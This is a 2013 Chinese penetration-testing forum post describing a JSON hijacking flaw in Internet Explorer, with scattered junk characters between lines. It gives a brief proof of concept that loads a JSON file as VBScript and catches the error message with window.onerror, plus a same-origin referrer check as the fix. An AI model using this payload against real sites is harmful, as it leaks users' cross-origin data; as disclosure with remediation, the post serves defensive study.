中国网络渗透测试联盟
标题:
IE通用JSON劫持漏洞
[打印本页]
作者:
admin
时间:
2013-2-23 11:33
标题:
IE通用JSON劫持漏洞
简要描述:
- Y3 F& Z; U3 {, k
! e% w" K. W% b1 z* R. c4 Y
由于某些资源容器对数据处理不当导致json劫持漏洞.
7 Z. f) I# u! j# _
详细说明:
8 c/ \! [% n" R! B
由于ie支持vbscript,所以script元素可以指定成vbscript语言:
- p3 b I" _( q- a5 C
<script language=vbscript></script>
! Y0 J* e9 n2 _# ~1 ]) Y3 @
. R: U! `1 `$ g6 F6 Y+ N
当但我们指定的是一个js格式的文件是将会发现一个异常,这使我们通过捕获这个异常的信息来获得部分json数据.
! A, d) o3 _1 g
漏洞证明:
" `+ m! F2 y' i" N7 v) N
<script>
8 a/ O/ C! t2 f7 D
window.onerror=function(_){
2 d+ w, a9 u. d, j0 ~0 v* a
alert(_)
4 i4 C9 t% @. |5 T* Z; Y
}
( O2 e4 U$ o, a# u% x$ S, ^
</script>
- q0 S, O$ A, z5 I$ T0 M7 ?8 I
<script language=vbscript src=1.json></script>
* T1 ~- I; p6 U9 W: j
& p( X+ M) d7 b: L; Y
# M7 r9 }0 l& e0 C" w2 R1 `) b
1.json:
( w: r, N+ i9 [) q n8 }& M3 O
[{"name":"sogili","age":19}]
5 \6 F+ d7 W1 ?0 Z; @/ ?6 U5 x
修复方案:
# y$ q7 C* X; X9 F. }; |
网站业务对于这个问题可以通过验证referrer是否为同源来防御
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2